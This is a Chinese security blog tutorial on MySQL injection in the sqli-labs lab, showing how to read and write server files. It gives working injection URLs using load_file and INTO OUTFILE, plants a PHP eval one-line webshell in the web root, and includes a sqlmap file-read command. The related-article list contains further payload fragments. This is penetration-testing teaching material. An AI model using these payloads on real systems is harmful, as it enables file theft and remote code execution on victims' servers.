【安全】P 2-6 MySQL注入读写

最新推荐文章于 2024-08-15 21:12:47 发布
原创 最新推荐文章于 2024-08-15 21:12:47 发布 · 242 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #信息安全 #渗透测试

本文介绍了MySQL注入中读取和写入文件的技术细节,包括如何利用特定SQL语句读取服务器上的文件、写入文件乃至植入webshell,并通过sqlmap工具进行安全测试。

目录

0X01 MySQL注入读文件

MySQL数据库在渗透过程中能够使用的功能还是比较多的,除了读取数据之外,还可以进行对文件进行读写(前提是权限足够)。下面进行读文件。

读取前提:
1.用户权限足够高,尽量具有root权限
2.secure_file_priv 不为null
在这里插入图片描述
修改配置
在这里插入图片描述
在这里插入图片描述
测试
在这里插入图片描述

漏洞利用演示
在这里插入图片描述

http://127.0.0.1/sqli-labs/Less-1/?id=-1’ union select 1,load_file(“C:\flag.txt”),3 –

0X02 MySQL注入写文件

开启全局general_log
在这里插入图片描述

http://127.0.0.1/sqli-labs/Less-7/?id=-1’)) union select 1,’<?php phpinfo();?>’,3 into outfile ‘C:\phpStudy\PHPTutorial\WWW\sqli-labs\Less-7\1.php’ –
在这里插入图片描述

成功写入
在这里插入图片描述

0X03 写入webshell

写入一句话木马,<?php @eval($_POST['cmd']);?>
使用菜刀连接
http://127.0.0.1/sqli-labs/Less-7/?id=-1’)) union select 1,’<?php @eval($_POST[''cmd]);?>’,3 into outfile ‘C:\phpStudy\PHPTutorial\WWW\sqli-labs\Less-7\2.php’ –
在这里插入图片描述
在这里插入图片描述

0X04 sqlmap安全测试

利用sqlmap进行读写文件
sqlmap -hh 查看详细的帮助信息
在这里插入图片描述

sqlmap.py -u “http://127.0.0.1/sqli-labs/Less-7/?id=1” --file-read “C:\flag.txt”

在这里插入图片描述
在这里插入图片描述
读取成功
可以自己根据语法再尝试一下写入操作

-----E-----N-----D-----
😄如有问题,请各位师傅斧正,你的支持是我最大的动力。

Python全栈(五)Web安全攻防之7.MySQL注入读写文件和HTTP头中的SQL注入
CUFEECR的博客
03-10 4668
pikachu是一个比较详细的漏洞平台;MySQL读取文件用load_file()函数;写入文件用into outfile。UPDATEXML()函数用于捕捉错误;在user-agent后加入payload进行user-agent注入;通过修改请求头中的referer进行SQL注入测试,可以通过3种方式进行安全测试;在请求头的cookie参数中加入payload‘进行cookie测试;使用Base64加密的注入语句,插入到Cookie对应的位置完成SQL注入漏洞的探测。
【小迪安全day13】WEB漏洞——SQL注入MYSQL注入
RichUee的博客
12-05 1577
MYSQL注入中首先要明确当前注入点权限,高权限注入时有更多的攻击手法,有的能直接进行getshell。其中也会遇到很多阻碍,相关防御方案也要明确,所谓知己知彼,百战不殆。不论作为攻击还是防御都需要了解其中的手法和原理,这样才是一个合格的安全工作者。
mysql 报错注入写文件_mysql注入总结
weixin_29802461的博客
01-26 597
目录:0x00 mysql一般注入(select)0x01 mysql一般注入(insert、update)0x02 mysql报错注入0x03 mysql一般盲注0x04 mysql时间盲注0x05 mysql其他注入技巧0x06 mysql数据库版本特性0x07 声明正文:0x00 mysql一般注入(select)1.注释符#/*—2.过滤空格注入使用/**/或()或+代替空格%0c = f...
eval函数简介与PHP一句话木马剖析
weixin_44706754的博客
04-19 2156
eval函数简介与PHP一句话木马剖析 一、eval函数 eval() 函数把字符串按照 PHP 代码来计算。 该字符串必须是合法的 PHP 代码,且必须以分号结尾。 如果没有在代码字符串中调用 return 语句,则返回 NULL。如果代码中存在解析错误,则 eval() 函数返回 false。 二、eval函数的一般用法 <?php $string = "beautiful"; ...
WEB攻防-通用漏洞-SQL 读写注入-MYSQL&MSSQL&PostgreSQL
weixin_45534587的博客
07-23 915
高权限注入指的是攻击者通过SQL注入漏洞,利用具有高级权限的数据库账户(如MYSQL的root用户、MSSQL的sa用户、PostgreSQL的dba用户)执行恶意SQL语句。这些高级权限账户能够访问和修改数据库中的所有数据,甚至执行操作系统级别的命令。
使用Sharding-JDBC 实现Mysql读写分离
Lifelong learning
07-17 3815
介绍了MySQL读写分离架构搭建以及使用Sharding-JDBC去实现程序中无感知使用读写分离。httpshttps。
第二十五天:WEB攻防-通用漏洞&SQL读写注入&MYSQL&MSSQL&PostgreSQL
m0_51322401的博客
01-31 727
分为盘符绝对路径和网址绝对路径盘符绝对路径:顾名思义如图:网址绝对路径:网址的路径,如下图-路径获取:phpinfo,报错,字典等-无法写入:secure_file_priv突破 注入中需要支持SQL执行环境,没有就需要借助phpmyadmin或能够直接连上对方数据库进行绕过set global slow_query_log_file=‘shell路径’;select '
MySQL数据库读写分离的两种方法
最新发布
weixin_69088860的博客
08-15 833
中插入数据,不能创建,一直卡在插入数据的那里,插不进去,一旦解锁,配置后端真实有效的用户、密码、真实数据库名称等信息。的对外的用户、密码、映射数据库名称等信息。查看状态信息,查到是空的话是因为没有写。查看端口(有端口就是启动成功了)补充(报错的话查看错误日志)用户给权限(不能执行,因为。修改配置文件(从数据库)语句就会立马执行成功。执行查询数据库的语句。停止服务(主数据库)查看主从配置详细信息。名称为真的是数据库名称。将查到的语句进行打印。
web安全基础--SQL注入笔记
m0_57291352的博客
05-03 1282
课程学习:https://www.bilibili.com/video/BV1VA411u7Tg?p=9 数据库 基础操作 登录:C:\WINDOWS\system32>mysql -uroot -p 查看库名show databases 创建数据库create database 库名 删除数据库drop database 库名 使用(切换)数据库use 库名 建立表create table 表名('id' 数据类型,...); 查看表的结构desc 表名; 插入Insert into 表名 valu
18-OWASP top10--SQL注入(三、MSSQL、Mysql手工注入及Sqlmap工具使用)
XLbb的博客
05-27 1806
' 与and 1=1 and 1=2--检查注入点 ' order by 1,2--+&Submit=Submit#--检查字段 ' union select user(),version()--+&Submit=Submit# --查看数据库用户名和版本、库名 'union select 1,group_concat(schema_name) from inform 注入防御 1、涵数过滤 2、直接下载相关防范注入文件,通过incloud包含放在网站配置文件里面 3、PDO预处理
精选资源
mysql-connector-java-8.0.23.jar
12-18
6. **预编译语句**:提高执行效率,通过预编译SQL语句来防止SQL注入攻击。 7. **游标支持**:允许双向滚动和处理大数据集。 8. **连接池支持**:可以配合像C3P0、HikariCP或Apache DBCP等连接池组件,有效管理数据库...
精选资源
mysql-connector-java-8.0.13.jar
01-06
MySQL Connector/J是MySQL官方提供的JDBC驱动,使得Java应用程序能够无缝地连接到MySQL数据库,执行SQL查询,进行数据读写操作。 MySQL Connector/J 8.0.13 是针对MySQL 8.0.x系列的驱动,这意味着它支持MySQL ...
安全】P 6 文件上传漏洞(手工+工具)绕过合集
Z_David_Z的博客
02-27 3805
目录0X01 绕过JS验证JS验证代码分析Burpsuite剔除响应JS浏览器审计工具剔除JS上传Webshell,菜刀连接0X02 绕过MIME-Type验证MIME-Type介绍验证MIME-Type代码分析Burpsuite绕过MIME-Type验证菜刀连接 虚拟终端功能0X03 绕过黑名单验证基于文件后缀名验证介绍基于黑名单验证代码分析Burpsuite绕过黑名单验证上传webshell菜刀连接0X04 绕过黑名单验证(.htaccess).htaccess文件介绍配置文件http.conf审计黑名
安全】一次渗透测试完整流程
Z_David_Z的博客
01-13 2150
渗透测试完整流程前言渗透测试与入侵的最大区别常规渗透测试流程0x01 明确目标0x02 信息收集0x03 漏洞探测0x04 漏洞验证0x05 信息分析0x06 获取所需0x07 信息整理0x08 形成报告思维导图 前言 ==WEB安全渗透测试不是随便拿个工具扫一下就可以做的,要了解业务还需要给出解决方案。 == 渗透测试与入侵的最大区别 渗透测试:出于保护系统的目的,更全面地找出测试对象的安全隐患。 入侵:不择手段地(甚至具有破坏性的)拿到系统权限。 常规渗透测试流程 明确目标—>信息收集—>漏
安全】P 5-6 GET型CSRF漏洞利用方法
Z_David_Z的博客
02-23 2146
目录0X01 链接利用0X02 iframe利用0X03 img标签利用0X04 CSS-backgroud利用 0X01 链接利用 在html中,a标签代表链接,可以将当前的”焦点” 指引到其他位置。 移动的“焦点”需要发送对应的请求到链接指向的地址,然后返回响应。 <a href = “请求地址,会被http 请求到的位置,可以携带GET型参数”> 内容 </a> <a href = “http://127.0.0.1/csrf_test/get_csrf/new_user
计算机体系结构(简记)
Z_David_Z的博客
10-27 1768
复杂指令集(Complex Instruction Set Computer):每个指令做复杂动作,完成操作需要较少指令,庞大。各种编程语言开发的软件项目:Java、PHP、C、Python、Ruby、Go…客户端:迅雷、QQ、百度网盘、腾讯课堂、网易云音乐、游戏客户端、腾讯视频.…常见的手机处理器:高通骁龙系列、苹果A系列、海思、麒麟系列、联发科天玑系列。3.5寸机械盘、2.5寸机械盘、2.5寸SATA固态盘、M.2固态盘。输入设备:键盘、鼠标、麦克风、摄像头、扫描仪、数位板、游戏手柄等等;
安全】P 7-1 SSRF漏洞原理介绍
Z_David_Z的博客
02-28 1369
目录0X01 SSRF漏洞定义0X02 SSRF漏洞原理0X03 SSRF漏洞代码分析0X04 SSRF漏洞利用 0X01 SSRF漏洞定义 SSRF(server-site request forery,服务端请求伪造)是一种构造请求,由服务端发起请求的安全漏洞。 一般情况下,SSRF的目标就是与外部隔离的内网资源。 0X02 SSRF漏洞原理 SSRF形成原因:服务端提供了从其他服务器获取数据的功能,但没有对内网目标地址做过滤与限制。 主要方式: 1、对外网、服务器所在内网、本地进行端口扫描,获取Ba
Linux操作系统介绍(简记)
Z_David_Z的博客
10-27 1171
1、使用网络的程序,都有一个服务器;2、服务器,大部分使用的是Liux操作系统。
安全】P 4-12 Javascript伪协议触发XSS
Z_David_Z的博客
02-20 1127
目录0X01 javascript伪协议介绍0X02 XSS漏洞发现0X03 a链接标签属性href介绍0X04 Payload触发XSS漏洞 0X01 javascript伪协议介绍 将javascript代码添加到客户端的方法是把它放置在伪协议说明符javascript:后的URL中。这个特殊的协议类型声明了URL的主体是任意的javascript代码,它由javascript的解释器运行。如果javascript:URL中的javascript代码含有多个语句,必须使用分号将这些语句分隔开。 java
分享最新版 MySQL 驱动包 mysql-connector-java-5.1.18
1. 支持多种连接方式:该驱动程序支持标准的 JDBC 连接方式,可以通过 DriverManager 或者使用连接池(如 C3P0、DBCP、HikariCP)来建立与 MySQL 数据库的连接。 2. 多版本兼容性:适用于 MySQL 5.x 系列数据库,并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值